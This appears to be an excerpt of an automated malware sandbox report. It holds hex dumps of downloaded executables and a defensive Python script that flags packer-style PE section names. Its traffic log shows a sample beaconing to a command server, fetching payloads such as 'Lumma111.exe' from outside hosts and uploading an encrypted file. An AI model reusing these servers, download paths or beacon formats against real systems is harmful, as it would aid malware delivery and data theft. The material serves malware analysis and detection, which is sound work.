00 70 4b 00 00 04 00 00 02 b1 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 70 05 00 70 00 00 00 00 60 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 71 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 60 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 05 00 00 02 00 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2b 00 00 80 05 00 00 02 00 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6b 78 67 68 68 77 69 00 90 1a 00 00 a0 30 00 00 8e 1a 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 e0 79 6a 65 79 79 78 70 6c 00 10 00 00 00 30 4b 00 00 04 00 00 00 02 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4b 00 00 22 00 00 00 06 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 20:09:39 GMTContent-Type: application/octet-streamContent-Length: 1848320Last-Modified: Wed, 20 Nov 2024 19:42:28 GMTConnection: keep-aliveETag: "673e3ba4-1c3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 22 01 00 00 00 00 00 00 e0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 6b 00 00 04 00 00 78 76 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2b 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 67 6a 70 6d 6c 72 63 00 a0 1a 00 00 30 50 00 00 96 1a 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 6a 72 70 71 6b 72 70 00 10 00 00 00 d0 6a 00 00 04 00 00 00 0e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 6a 00 00 22 00 00 00 12 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 20:09:48 GMTContent-Type: application/octet-streamContent-Length: 922624Last-Modified: Wed, 20 Nov 2024 19:40:35 GMTConnection: keep-aliveETag: "673e3b33-e1400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 2b 3b 3e 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 64 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 d6 ff 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 60 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 a8 00 00 00 40 0d 00 00 aa 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9e 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 20:09:56 GMTContent-Type: application/octet-streamContent-Length: 2768384Last-Modified: Wed, 20 Nov 2024 19:41:02 GMTConnection: keep-aliveETag: "673e3b4e-2a3e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 6b 14 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 79 73 64 6e 6e 65 6d 00 e0 29 00 00 a0 00 00 00 dc 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 76 63 6e 73 67 63 6d 00 20 00 00 00 80 2a 00 00 06 00 00 00 16 2a 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 1c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 20:10:02 GMTContent-Type: application/octet-streamContent-Length: 2768384Last-Modified: Wed, 20 Nov 2024 19:41:03 GMTConnection: keep-aliveETag: "673e3b4f-2a3e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 6b 14 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 79 73 64 6e 6e 65 6d 00 e0 29 00 00 a0 00 00 00 dc 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 76 63 6e 73 67 63 6d 00 20 00 00 00 80 2a 00 00 06 00 00 00 16 2a 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 1c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
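The three 200 OK responses above are truncated dumps of downloaded executables, and their section tables are already telling: the 1 848 320-byte and 2 768 384-byte files carry section names such as three spaces (20 20 20 00 20 20 20 20), ".idata  " with trailing spaces, eight spaces, random eight-letter names (lgjpmlrc, fjrpqkrp, fysdnnem, nvcnsgcm) and .taggant, while the 922 624-byte file has the ordinary .text/.rdata/.data/.rsrc/.reloc layout. The following is an added example, not Joe Sandbox code, that walks a PE section table and applies the same kind of check the report's "PE file contains section with special chars" signature encodes. Only the section names and counts are taken from the dumps; the PE images built here are constructed skeletons with zeroed headers, not the real files.

```python
"""Section-table audit for PE images (added example, not Joe Sandbox code).
Section names below are read from the report's hex dumps; the images that
wrap them are constructed skeletons, not the downloaded executables."""
import re
import struct

# Names a stock MSVC/MinGW build emits; anything else deserves a look.
KNOWN_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                  ".edata", ".pdata", ".tls", ".bss", ".CRT", ".didat"}
PRINTABLE = re.compile(rb"^[\x21-\x7e]+$")   # visible ASCII, no spaces


def section_names(image: bytes) -> list[bytes]:
    """Return the raw 8-byte Name field of every section header."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew, = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not at e_lfanew")
    # COFF header follows the signature: NumberOfSections at +2 and
    # SizeOfOptionalHeader at +16, i.e. e_lfanew + 6 and e_lfanew + 20.
    count, = struct.unpack_from("<H", image, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", image, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size
    if table + 40 * count > len(image):
        raise ValueError("section table truncated")
    return [image[table + 40 * i: table + 40 * i + 8] for i in range(count)]


def classify(name: bytes) -> str:
    """Verdict for one section name (already cut at the first NUL)."""
    if not name.strip():
        return "blank"                 # empty or spaces only
    if not PRINTABLE.match(name):
        return "special-chars"         # embedded spaces or control bytes
    if name.decode("ascii") in KNOWN_SECTIONS:
        return "standard"
    return "unusual"                   # random names, packer sections


def audit(image: bytes) -> list[tuple[str, str]]:
    """(name, verdict) per section; the loader ignores bytes after a NUL."""
    out = []
    for raw in section_names(image):
        name = raw.split(b"\0", 1)[0]
        out.append((name.decode("latin-1"), classify(name)))
    return out


def looks_packed(image: bytes) -> bool:
    """True when any section name is blank, has special chars or is unusual."""
    return any(v != "standard" for _, v in audit(image))


def build_image(names: list[bytes]) -> bytes:
    """Constructed PE32 skeleton: DOS header, PE signature, zeroed optional
    header and a section table carrying the given names.  Not loadable."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)       # e_lfanew: right after DOS header
    opt_size = 0xE0                                # PE32 optional header size
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(names), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)          # PE32 magic
    table = b"".join(n.ljust(8, b"\0")[:8] + bytes(32) for n in names)
    return bytes(dos) + coff + bytes(opt) + table


# Section names read from the report's three response dumps.
DUMP_1848320 = [b"   \0    ", b".rsrc", b".idata  ", b"        ",
                b"lgjpmlrc", b"fjrpqkrp", b".taggant"]
DUMP_922624 = [b".text", b".rdata", b".data", b".rsrc", b".reloc"]
DUMP_2768384 = [b"   \0    ", b".rsrc", b".idata  ", b"fysdnnem",
                b"nvcnsgcm", b".taggant"]

if __name__ == "__main__":
    for label, names in (("1848320", DUMP_1848320), ("922624", DUMP_922624),
                         ("2768384", DUMP_2768384)):
        for name, verdict in audit(build_image(names)):
            print(f"{label}: {name!r:<14} {verdict}")
        print(label, "looks packed:", looks_packed(build_image(names)))
```

The check cuts each name at the first NUL, as the loader does, so "   \0    " is judged by its three leading spaces rather than the padding. .taggant is listed as "unusual" rather than malicious on its own: it is the section the IEEE taggant scheme uses, but here it sits next to blank and random names, which is what makes the two larger downloads stand out from the 922 624-byte one.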
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 37 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007743001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: GET /files/Lumma111.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 37 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007744001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 37 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007745001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 37 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007746001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------dOjK09zs8QI4YHDEtGX82bData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 4f 6a 4b 30 39 7a 73 38 51 49 34 59 48 44 45 74 47 58 38 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 69 6b 61 71 69 6c 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 8a 62 f9 ab 11 0c 4e 6a 6a a0 e1 1f 2f d1 a3 1b d8 fc fa ba 37 41 b7 01 b4 66 3e a2 a7 a7 96 85 06 af de 23 10 69 45 a2 9e 0f 11 53 61 1d 69 06 3c 2c d3 c4 49 49 5d c2 3f 14 dc e9 92 a6 77 ee 81 4e 2a 56 3c 7e a7 a2 22 11 5e bf 76 bb 19 a6 ba 76 b9 cf dd be db 1e 79 76 7a bb e4 16 b3 3d 47 8a d7 76 45 c5 22 72 f1 2b 41 a5 ca 56 05 9e 69 6d cc b0 cd 58 44 ed 99 79 af 63 a5 5a 64 87 26 8f da 1e b8 82 ec ee 68 9c d4 47 3b 75 bd 9a 00 80 37 86 f1 b8 0b 96 2f 31 b1 41 1d b0 78 e8 ee ea 1a 21 43 8f d3 98 cb 49 45 6f 07 e9 e1 0f 9f ee 5e fc 12 34 da 5e 36 1b 1d d7 a1 0e f3 0b 6b e4 3a 5a ec 6a 10 4f cb 1d 61 f5 f9 54 dd 80 ff 12 89 79 98 a8 9d 22 21 10 46 92 21 56 a2 59 87 a2 f1 a0 0c 41 4f 76 c7 98 f6 21 07 f1 0c e9 b9 60 b7 87 4f 80 67 91 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 4f 6a 4b 30 39 7a 73 38 51 49 34 59 48 44 45 74 47 58 38 32 62 2d 2d 0d 0a Data Ascii: --------------------------dOjK09zs8QI4YHDEtGX82bContent-Disposition: form-data; name="file"; filename="Likaqila.bin"Content-Type: application/octet-streambNjj/7Af>#iESai<,II]?wN*V<~"^vvyvz=GvE"r+AVimXDycZd&hG;u7/1Ax!CIEo^4^6k:ZjOaTy"!F!VYAOv!`Og--------------------------dOjK09zs8QI4YHDEtGX82b--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
